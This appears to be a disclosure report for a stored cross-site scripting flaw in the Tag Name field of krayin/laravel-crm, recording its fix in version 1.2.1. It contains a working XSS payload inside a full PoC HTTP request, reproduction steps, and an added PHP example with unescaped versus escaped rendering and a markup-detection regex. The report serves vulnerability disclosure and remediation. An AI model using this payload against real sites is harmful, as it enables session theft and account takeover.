Cross-site Scripting (XSS) - Stored in krayin/laravel-crm

Valid

Reported on

Nov 29th 2021


Description

Stored XSS in the Name field of a Tag

Detail

When the Tag grid is rendered, the Name value is output without being escaped, so markup stored in a tag name is executed in the browser of whoever views the grid (stored XSS).

Proof of Concept

// PoC.req
POST /admin/settings/tags/edit/1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/admin/settings/tags/edit/1
Cookie: _ga=GA1.1.758235244.1637376300; PHPSESSID=2aj34hm8nmvep57jeno66ecbtn; XSRF-TOKEN=eyJpdiI6InFQWXVobjlWektDY2hZckcxZW9OMWc9PSIsInZhbHVlIjoiVDJ3blh5aGZOZlRaRGJqTUdCOGNnQm83RWN4K3RadWFQblpvMnloS1VVRkFxdGEreG9vUGlWbFdpVFVvTUM3a3NOM3ZiRTI0aCs5b0oxaGFzVVVOQ08vc1I4aHBaZHE1NUJtSVFVRStPR0ZPMUxncll6Um1hL21UVm5hd01KYysiLCJtYWMiOiIxYWM3NDc3Y2FhOWMzNjk3M2UxYTgxODYyMzgzMTJmZjc3MjEzYTI5NGE4ODI2NTIxNmE3ZWFlMDc3NjU5MTAxIn0%3D; krayin_crm_session=eyJpdiI6IjZXWG1PK1N3WVloY20ydjFTS0hROVE9PSIsInZhbHVlIjoiNHJLbzZrd2UwYm90QWE0SFhXcWMydmR2aDNHRUxLUGNMZjJYZGhDZE14QUdvUXk2dloxQjZocGltMUxQd0piSmRmM00rL2Q5cGV1bjdNeTV2cThZZFhmRkhzcmtpY25Zbm5KUWxkZkEvS2t5dUMyMFdRREdQUXdacEF2Y2VFQVMiLCJtYWMiOiJkNWY5NTRiMmZiOWE2ZTNiMjdkNjZiNzI2ZWI2MDg0NGU4ZGI4YTM3ZmNkM2Q5NzhiZTVjMzg0YmYwZTRiOWQ1In0%3D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache

_token=nTihBpMW1L7emIz9py20nTTtNR7XV9H4At5rpuqc&_method=PUT&name=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert%281%29%3B%22%3E

Steps to Reproduce

Go to Settings and choose Tags.

Choose Create Tag and enter the following payload in the Name input: "><iMg SrC="x" oNeRRor="alert(1);">
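Added here as an example (not krayin/laravel-crm's own code): the name value from the PoC request above, rendered into a grid cell with and without output encoding, plus a helper to flag stored names that contain markup. The cell markup, the function names and the Blade mapping in the comments are assumptions.

```php
<?php
// Added example, not code from krayin/laravel-crm: shows the tag name from the
// PoC above placed in a grid cell with and without output encoding, plus a
// detection helper. All function names and the cell markup are assumptions.
declare(strict_types=1);

// Encode a value for an HTML text or quoted-attribute context. ENT_QUOTES also
// encodes single quotes; ENT_SUBSTITUTE keeps invalid UTF-8 from blanking the value.
function escapeTagName(string $name): string
{
    return htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Unescaped rendering: the stored name is concatenated straight into markup,
// so a name starting with "> closes the attribute and the tag.
// (In Blade the unescaped form is {!! $tag->name !!}.)
function renderTagCellUnsafe(string $name): string
{
    return '<td><input type="text" value="' . $name . '"></td>';
}

// Fixed rendering: the same cell, with the value encoded first.
// (In Blade, {{ $tag->name }} applies this encoding by default.)
function renderTagCellSafe(string $name): string
{
    return '<td><input type="text" value="' . escapeTagName($name) . '"></td>';
}

// Pull the "name" field out of a form-encoded body such as the PoC request.
function tagNameFromFormBody(string $body): string
{
    parse_str($body, $fields);
    return (string) ($fields['name'] ?? '');
}

// Detection aid for logs or review: flag stored names containing tag
// delimiters or an on*= event handler. Encoding, not filtering, is the fix.
function looksLikeMarkup(string $name): bool
{
    return preg_match('/[<>]|\bon\w+\s*=/i', $name) === 1;
}

// Constructed from the PoC body in this report (CSRF token omitted).
$body = '_method=PUT&name=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert%281%29%3B%22%3E';
$name = tagNameFromFormBody($body);

echo renderTagCellUnsafe($name), PHP_EOL;  // attribute broken out of, <img> injected
echo renderTagCellSafe($name), PHP_EOL;    // quotes and angle brackets encoded, shown as text
var_dump(looksLikeMarkup($name));
```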

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

Timeline

lethanhphuc submitted the report.
Devansh validated this vulnerability.
lethanhphuc was awarded the disclosure bounty.
The fix bounty was opened.
Devansh marked this as fixed in 1.2.1 with commit 093e62.
lethanhphuc was awarded the fix bounty.
This vulnerability will not receive a CVE.